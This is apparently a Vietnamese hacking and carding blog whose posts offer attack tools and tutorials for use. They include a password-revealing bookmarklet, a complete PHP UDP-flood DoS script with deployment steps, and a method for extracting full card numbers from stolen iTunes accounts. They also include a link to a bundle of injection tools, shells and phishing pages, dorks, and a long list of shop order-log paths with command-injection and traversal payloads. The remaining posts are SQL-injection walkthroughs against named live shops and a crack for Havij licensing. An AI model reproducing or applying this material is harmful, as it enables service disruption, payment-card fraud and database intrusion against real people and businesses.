Hiển thị các bài đăng có nhãn Hacking. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Hacking. Hiển thị tất cả bài đăng

Chủ Nhật, 16 tháng 10, 2011

Domain .vn

Cái này mình tự tìm ra. Domain cũng reg dc 1 thời gian oy vẫn live nên viết bài này cho ae chém nó nhiệt tình
ccv
Sock từa lưa nhưng cứ trùng cho nó ăn chắc, tầm 1-2 tuần mới có mail báo live
nếu live thì nên dùng luôn dns của nó. muốn đổi dns trung gian thì phải mất thêm 100$ nữa. nhưng xài của nó cũng ngon
Demo : vdictn.vn
http://whois.domaintools.com/vdictn.vn
victim : www.united-domains.de
proof



Thứ Hai, 29 tháng 8, 2011

Share đoạn Java soi passwd


javascript: var p=r(); function r(){var g=0;var  x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var  k=0;k<w.length;k++) {var x = ((x) ||  (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' +  g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++)  {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j]))  {b=true}}}return b;}function h(ej){var s='';if  (ej.type=='password'){s=ej.value;if (s!=''){prompt('Soi mật khẩu',  s)}else{alert('Mật khẩu trống')}return true;}}  

ANONIMYOUS DDOS


    <?php
    $ip = $_SERVER['REMOTE_ADDR'];
    ?>
    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    
    <head>
            <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
            <meta name="author" content="">
    
            <title>PHP DoS, Coded by EXE</title>
    </head>
    <!-- PHP DOS, coded by EXE -->
    <style type="text/css">
    <!--
    body {
            font-family: Arial, Helvetica, sans-serif;
            font-size: 12px;
            font-style: normal;
            line-height: normal;
            color: #FFFFFF;
            background-color: #000000;
    }
    
    
    
    -->
    </style>
    <!-- PHP DOS, coded by EXE -->
    <body>
    <center><br><br>
    <img src="main.jpg"><br>
    <b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
    <form name="input" action="function.php" method="post">
    IP:
    <input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
    &nbsp;&nbsp;&nbsp;&nbsp;Time:
    <input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
    &nbsp;&nbsp;&nbsp;&nbsp;Port:
    <input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
    <br><br>
    <input type="submit" value="    Start the Attack--->    ">
    <br><br>
    <center>
    After initiating the DoS attack, please wait while the browser loads.
    </center>
    
    </form>
    </center>
    <!-- PHP DOS, coded by EXE -->
    </body>
    </html>

RAW Paste Data

</style>
<!-- PHP DOS, coded by EXE -->
<body>
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value="    Start the Attack--->    ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<!-- PHP DOS, coded by EXE -->
</body>
</html>

DoS Script

Credit goes to: EXE of ZeroDayExile.
So, here it is...

How does this work after you've created it?

    Upload the Script
    Open it in browser
    Type the ip adress/host and port (ip add.r.e.ssort | 127.0.0.1:80) of the victim and type in how long you want to DDOS the server.
    When the script has finish it will show you the DoS result


This requires two files, first...
The main page should be named function.php.
Created as follows:

?php

$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);


$exec_time = $_POST['time'];


$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;






for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>


and this in index.php:
Code:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01


Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
<meta http-equiv="content-type" content="text/html;


charset=iso-8859-1">
<meta name="author" content="">


<title>PHP DoS</title>
</head>
<style type="text/css">
<!--
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #FFFFFF;
background-color: #000000;
}






-->
</style>
<body>
<center><br><br>
<br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;


(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main"


value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';"


onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20"


class="main" value = "time (in seconds)" onblur = "if ( this.value=='' )


this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time


(in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main"


value = "port" onblur = "if ( this.value=='' ) this.value = 'port';"


onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value=" Start the Attack---> ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser


loads.
</center>


</form>
</center>
</body>
</html>

THEN, you will need the main index.php file, as follows:

<?php$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01

Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html;

charset=iso-8859-1">
<meta name="author" content="">

<title>PHP DoS</title>
</head>
<style type="text/css">
<!--
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #FFFFFF;
background-color: #000000;
}



-->
</style>
<body>
<center><br><br>
<br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;

(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main"

value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';"

onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20"

class="main" value = "time (in seconds)" onblur = "if ( this.value=='' )

this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time

(in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main"

value = "port" onblur = "if ( this.value=='' ) this.value = 'port';"

onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value=" Start the Attack---> ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser

loads.
</center>

</form>
</center>
</body>

</html>

Note you can tweak this as you see fit.
You will need to use your own CSS and images if you don't want it to be a plain black and white page.
That you will have to do on your own, because I don't feel like doing a CSS tutorial.

PHP DoS Coded by Exe

<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
    <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
    <meta name="author" content="">

    <title>PHP DoS, Coded by EXE</title>
</head>
<!-- PHP DOS, coded by EXE -->
<style type="text/css">
<!--
body {
    font-family: Arial, Helvetica, sans-serif;
    font-size: 12px;
    font-style: normal;
    line-height: normal;
    color: #FFFFFF;
    background-color: #000000;
}



-->
</style>
<!-- PHP DOS, coded by EXE -->
<body >
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font> (Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
    Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
    Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value="    Start the Attack--->    ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<!-- PHP DOS, coded by EXE -->
</body>
</html>

Lấy CC number từ Apple Account

+ Tut rất phù hợp với bé nào check dc acc vs là acc paypal vs là acc Itunes mà lại bị dính ver card


Cũng đơn giản thôi. Trước trong 1 lần check mailpass, gặp được vài cái Mail có tài khoản Paypal, nhưng do SOCK kém lên bị PP bắt Veriy bằng số thẻ CC.Mình quay lại kiểm trả inbox và thấy chủ Mail còn có Acc iTune, vào iTune thì thấy 4 số cuối trùng với 4 số của Paypal - nghĩa là cùng 1 thẻ.
Bước 1: - Change Country. Giả sử Acc đang là US thì đổi sang UK chẳng hạn. Sau đó nó sẽ xác nhận mấy cái điều khoản này nó. Đồng ý rồi ấn Ok là xong. Lúc này thường thì nó sẽ chuyển ta vào trang Edit Payment vì khi đó thông tin thanh toán không còn Match với Bank nữa. Nếu vì lý do nào đó nó không tự động thì ta vào trang quản ly Account ấn vào Edit Payment Infomation, lúc này số thẻ vẫn chưa hiện ra, ta đừng thay đổi gì cả mà cứ ấn vào cái nút Done Khi đó iTune nó sẽ báo lỗi địa chỉ và show hết cả số thẻ ra. Tất nhiên nó không Show CV2 :nonnay:
Highslide JS
Highslide JS
Highslide JS
Highslide JS
Highslide JS
Bước 2: Copy số thẻ thôi chứ còn gì nữa

ALL Tools Hack Shop & Tuts Shipped

Đi lòng vòng trên GG thì thấy cái này hay hay nên Leech về Share cho anh em Newbie. Mong rằng sẽ không trùng bài với ai! Ai thấy có ích thì cho xin cái THANK nha!

*Bộ Tools & Tuts được tổng hợp từ:
+ HKV Group
+ Newbie Group
+ DF Group
+ Google.com
........




Gồm có:
- Pangolin 3.0.01011
- darkMSSQL, darkMySQLi & darkjumper của darkc0de
- Havij 1.1
- MySQLi Dumper 3.6
- Web Cruiser Ent 2.1
- sqliHelper 2.7
- GH MD5 Cracker 1.0
- Admin Finder 1.0
- Exploit scanner 1.0
- prj Site Hack 1.0
- Blues Port Scan 5.0.2.1265
- M4xmssql & M4xmysql 1.0
- Tools Lọc EXP & Lọc Trùng
- String - ASCII, HEX, Binary Converter
- PeCompact - Unpacker, PEiD & OLLYDBG
- 140 shells của Xgr0up
- Passwords Pro 3.0
- RC4
- CC2Bank 1.3
- BSQL Hacker 9.0.0.7
- JSky Enterprise Edition 1.5.0.153
- HTTP request testing 1.0
- Encoder 1.0
- Demon - scan sub-domains 1.1
- Brute Force Test 1.0
- IIS Put Scanner 1.3
- Mars Banks Base 1.1
- Jet SQL Injection 2.5
- Edjpgcom (run file .php.jpg)
- All Phishing Pages
- SSH socks
- Photoshop (CreditCard, DriverLicense & Passport)

Và một số Tuts tổng hợp khác....
Tools:
SSH socks:
Photoshop:
All Phishing Pages:
Tuts:
Hacking:
Bin:
Doman-Hosting-Server-Reseller:
Jewelleries-Clothes-Chocolate:
Electroníc:
Other Tutorials:
Pass giải nén: forlornhope
Link Download: http://www.mediafire.com/?cqhjujdzmud

GG dork login admincp và phpmyadmin

Này thì phpmyadmin:

inurl:/phpmyadmin/sql.php?
này thì admincp

intitle:"Index of? admin OR passwd
intitle:"Index of? admin OR accounts

Hack CC bằng google

/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other
isinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&template=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&template=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template=sales.log
/cgi-bin/shopper.exe?search=action&keywords=***&template=sell.log
/cgi-bin/shopper.exe?search=action&keywords=order&template=admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=admin_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=shopper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00htm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt
/_private/shopping_cart.mdb

TUT mysql injection shop .html

Link error
http://perfumes.sthefani.com.br/miss-elysees-feminino-p-3375'.html
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') and p.products_quantity > 0 and p.products_status = '1' order by rand() limi' at line 1

select p.products_id, p.products_quantity, p.products_image, pd.products_name, p.products_price from all_products p left join all_products_description pd on pd.products_id = p.products_id and pd.language_id = '4' left join all_manufacturers m using(manufacturers_id) left join all_products_to_categories pc on pc.products_id = p.products_id where pc.categories_id = '6' and m.sthefani_manufacturers_status = '1' and p.manufacturers_id = '157' and p.products_id not in (3375\') and p.products_quantity > 0 and p.products_status = '1' order by rand() limit 4

[TEP STOP]


Nhiều bạn nghĩ đây là site .html thì chiến thế nào
Đơn giản cái đuôi .html chỉ là Rewrite URL dùng htaccess
Về bản chất cái site này là php vs mysql
Và với kinh nghiệm bản thân thì m biết cái source của site này là oscommerce
Và cái id bị lôi là products_id (nhìn ở p.products_id not in (3375\'))
Và Khai thác như bình thường thôi

Link exploit cho các bạn :
hxxp://perfumes.sthefani.com.br/miss-elysees-feminino-p-3375) and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5-- -.html
lorenzo_user@localhost : lorenzo_lojas : 5.0.92-community     lorenzo_user@localhost : lorenzo_lojas : 5.0.92-community
Mình làm tới đây thôi
Pro đi qua nhìn thấy thì Thanks e 1 cái nhé ^^

End tut

Thứ Sáu, 27 tháng 5, 2011

Để có havij Pro hack được https

Để có một havij Pro thật sự hack dc https, dump file, xml
Chính vì anh em sợ dính virus ở các bản đó nên mình mới đưa ra cách này nhé.
Cách của mình là làm giả server check license.
Đầu tiên các bạn mở file hosts ra

C:\WINDOWS\system32\drivers\etc\hosts
Thêm vào đó dòng : 127.0.0.1 itsecteam.com

Sau đó các bạn cài đặt hoặc havij Pro 1.14 bản chưa crack ( có thể cài trước cũng được )
Tiếp đó các bạn cài localhost bằng xampp hoặc vertrigo ( bất cứ webserver local nào cũng được )
Trong thư mục để chạy web bạn tạo folder sau : havij406
Ví dụ: xampp thì là D:\xampp\htdocs\havij406
Sau đó bạn tạo file check license với tên validate.php
Nội dung như sau :
Quote:
Code:
<?
echo ("Havij Ad...ced SQL Injection Tool|True|leoneblina@aol.com|03a8dff80e77702fb3fcc 44930923c6b");
?>
bạn ngắt mạng cho chạy localhost rồi bật havij lên đăng kí register

Các bạn dùng cái license của ai đó đã share mà tên người dùng là leoneblina@aol.com
trỏ đến file leoneblina.lic
Lúc đó sẽ register thành công.

Nhưng nó có nhược điểm là thỉnh thoảng mà ta hack dính đến cái nào của bản pro thì nó sẽ bị kiểm tra và báo là sai license. Anh em nhấn lại register thì lại hack được bình thường.
Sử dụng cách này thì các chức năng còn lại ngoài 3 chức năng đã nói không dùng được thì dùng vô tư. Nhất là chức năng bypass
Tránh được virus mà lại full hack dc https

Thứ Tư, 23 tháng 3, 2011

TUT hack shop php mysql injection 5.0

victim: https://www.185elgin.com/customer_te...timonial_id=25'


Quote:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

select * FROM customer_testimonials WHERE testimonials_id = 25\' 
de nhan biet loi nay co hack dc nua ko ta querry them 1 chut nay de nhan biet dc 

https://www.185elgin.com/customer_te...timonial_id=25 and 1=1/*

bat ra 1 page voi gia tri true = 1 

https://www.185elgin.com/customer_te...timonial_id=25 and 1=0/*

bat ra 1 page voi gia tri false = 0

anh em du dk tren thi tien hanh hack site nha'


bay gio ta di tim site nay co bao nhieu colum de khai thac ra loi 




https://www.185elgin.com/customer_te...,3,4,5,6,7,8--

Querry từ 1-8 nhảy ra lỗi này 

Quote:

nhay ra loi 3&6 ta lay o vi tri so 3 nhe
3

6
Đinh vị lấy số 3 làm tâm điểm như dưới nha !

bay gio ta tim xem phien ban mysql cua site nay la bao nhieu de tuy bien khai thac nhe

ta nen dung ham concat_ws(0x3a,version(),user(),database() de tim nhe

https://www.185elgin.com/customer_te...)),4,5,6,7,8--

nhu vay la ver mysql 5.0.xx


Quote:

5.0.51a-community:sendmc2_script@localhost:sendmc2_185elgi n

den day ta co the khai thac theo kieu inject mysql 5.0 roai 


ta di tim table dau tien cua site nhe

https://www.185elgin.com/customer_te...0limit%201,1--



